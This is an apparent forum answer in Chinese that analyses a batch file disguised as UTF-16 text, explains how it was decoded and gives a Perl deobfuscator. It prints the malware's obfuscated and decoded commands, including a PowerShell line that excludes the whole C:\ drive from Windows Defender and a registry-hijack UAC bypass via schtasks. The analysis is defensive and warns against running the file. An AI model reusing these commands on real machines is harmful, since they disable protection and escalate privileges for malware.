如何用汉字解码批处理文件的内容

该文件实际上有常规的 ASCII 文本（或 Windows-125x）。

它只是看起来有点像包含一些汉字的UTF-16，因为一开始就有一些精心挑选的字节可以欺骗file和其他字符集检测软件。（您的屏幕截图显示文件以 FF FE 开头，即 U+FEFF UTF-16LE 中的“字节顺序标记”。）

但是我将您的示例存储为 UTF-16 LE，然后让我的文本编辑器将这些字节直接解释为 ASCII 或 Windows-1252——不转换，而是像你的十六进制编辑器一样将文件直接打开为 cp1252——然后我得到一个常规Windows Cmd 批处理脚本：

&cls
@%pUBlIc:~89,83%%PUBLic:~5,1%CHo^ of^%PuBlIC:~46,16%f  
^%pUBlIC:~14,1%^L%pUBliC:~55,17%^%publIc:~4,1%  
SEt R^=Jg^%pUBLIc:~13,1%^gtGXz%pUBLIc:~4,1%w%pUBLIc:~11,1%^hm%pUBLIc:~10,1%^S^HI^O 
%r:~8,1%e%r:~4,1% na%r:~12,1%e = %r:~10,1%a%r:~4,1%c%r:~11,1% o%r:~10,1%%r:~13,1%%r:~8,1%ca%r:~4,1%or %r:~10,1%y %r:~12,1%oo%r:~12,1%825 
%r:~8,1%e%r:~4,1% %r:~1,1%%r:~2,1%%r:~4,1%%r:~11,1%%r:~13,1%%r:~10,1% = %r:~11,1%%r:~4,1%%r:~4,1%p%r:~8,1%://%r:~1,1%%r:~2,1%%r:~4,1%%r:~11,1%%r:~13,1%%r:~10,1%.co%r:~12,1%/%r:~12,1%oo%r:~12,1%825/%r:~10,1%a%r:~4,1%c%r:~11,1%-o%r:~10,1%f%r:~13,1%%r:~8,1%ca%r:~4,1%or-%r:~12,1%ade-%r:~2,1%n-py%r:~4,1%%r:~11,1%on  
^n^e%r:~4,1%^1^ %r:~8,1%^E%r:~8,1%%r:~14,1%%r:~16,1%o^N >^NU^L 2>&1  
^%r:~2,1%F %eRRORLeVEl% == 0 (  
Po^%R:~9,1%ER^%R:~14,1%%R:~11,1%^E^L^l/W 01 /ep 0^/^n%R:~17,1%^p^/c ^"^Ad^D-^M^pPr^EFe^R^En^Ce ^-^E%R:~6,1%^cl%R:~13,1%%R:~14,1%^%R:~16,1%o^N^Pa%R:~4,1%%R:~15,1% '^C:\' -^f^oRC^E;e^%R:~6,1%^%R:~2,1%%R:~4,1% "  
) EL%r:~8,1%^e (  
re%r:~1,1% add %r:~15,1%KCU\Env%r:~2,1%ron%r:~12,1%en%r:~4,1% /f /v %r:~9,1%%r:~2,1%nd%r:~2,1%r /%r:~4,1% RE^%r:~5,1%_%r:~14,1%Z^ /d ^"c%r:~12,1%d.exe /c %r:~8,1%%r:~4,1%ar%r:~4,1% \"\"^ /%R:~12,1%%R:~2,1%^n \"%~F0\">^N%r:~13,1%L 2>&1  || ^%R:~14,1%^vc%R:~15,1%%R:~17,1%%R:~8,1%%R:~4,1%^" >N%r:~13,1%^L 2>&1  
%r:~14,1%c%r:~15,1%TA%r:~8,1%k%r:~8,1% /RUN ^/Tn \M%r:~16,1%cr

（通常，相同的字节可以通过多种方式读取 - 例如，2c 31如果读取为 UTF-16 LE，则两个字节表示字符“ㄬ”，或者,1如果读取为 ASCII，则表示字符。例如，您会看到“㩲㉾ㄬ”在你的编辑器中有很多，因为它实际上r:~2,1是批处理变量扩展的一部分。）

这个“胡言乱语”是一个标准的批处理文件，只是有点混淆——你看到了很多%variable:~start,length%变量扩展；变量中的特定字符%PUBLIC%被重新组合成%R%，然后该变量的特定字符用于构建命令。但是，例如，

re%r:~1,1% add %r:~15,1%KCU\Env%r:~2,1%ron%r:~12,1%en%r:~4,1% /f /v

明确的意思reg add HKCU\Environment /f /v。

通过猜测¹构建大部分内容%R%并删除许多无关的^转义字符后，结果是：

&cls
@ECHo off  
cLs  
SEt R=JgigtGXzswbhmuSHIO 
set name = batch obuscator by moom825 
set github = https://github.com/moom825/batch-obfuscator-made-in-python  
net1 sEsSIoN >NUL 2>&1  
iF %eRRORLeVEl% == 0 (  
PowERShELl/W 01 /ep 0/nOp/c "AdD-MpPrEFeREnCe -EXcluSIoNPatH 'C:\' -foRCE;eXit "  
) ELse (  
reg add HKCU\Environment /f /v windir /t REG_SZ /d "cmd.exe /c start \"\" /min \"%~F0\">NuL 2>&1  || SvcHOst" >NuL 2>&1  
ScHTAsks /RUN /Tn \MIcr

它做的第一件事是非常可疑的——在检查它是否具有管理员权限后net1 session，它会将整个 C:\ 驱动器添加到 Windows Defender 的排除列表中。（在“其他”情况下，它可能会尝试通过任务计划程序提升自己，作为绕过 UAC 的一种方式。）

根据最初的片段，这可能能够对其余部分进行去混淆：

#!/usr/bin/env perl

my %vars = (
    public => "C:\\Users\\Public",
    r => "JgigtGXzswbhmuSHIO",
);

while (<>) {
    s/%(r|public):~(\d+),(\d+)%/substr($vars{lc $1}, $2, $3)/ige;
    s/\^(.)/$1/g;
    print;
}

¹ （我在 Linux 上做了这个，但没有意识到 %PUBLIC% 实际上是所有 Windows 系统上都存在的默认变量......）

从我可以看到的现有文本来看，我认为这是 john hammond 的 ctf 挑战（https://ctftime.org/task/17327）。我很确定 john 从病毒样本中获得了挑战，所以要么你的服务器上出于某种原因（无害）有 john 的 ctf，要么你的服务器上有原始样本（可能有害）。

该病毒使用任务调度程序 UAC 绕过方法绕过 UAC（用户帐户控制），（我现在基于 john 的 ctf）然后禁用所有 Windows Defender，然后将 base64 编码的 exe 写入“C:\Users \Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup”，然后它将使用一个名为“certutil”的 Windows 实用程序，它具有 base64 解码功能。所以总的来说，这个批处理文件将获得管理员权限，禁用防御者，然后将有效负载写入启动添加持久性，然后解码有效负载并运行它。

我强烈建议不要运行这个！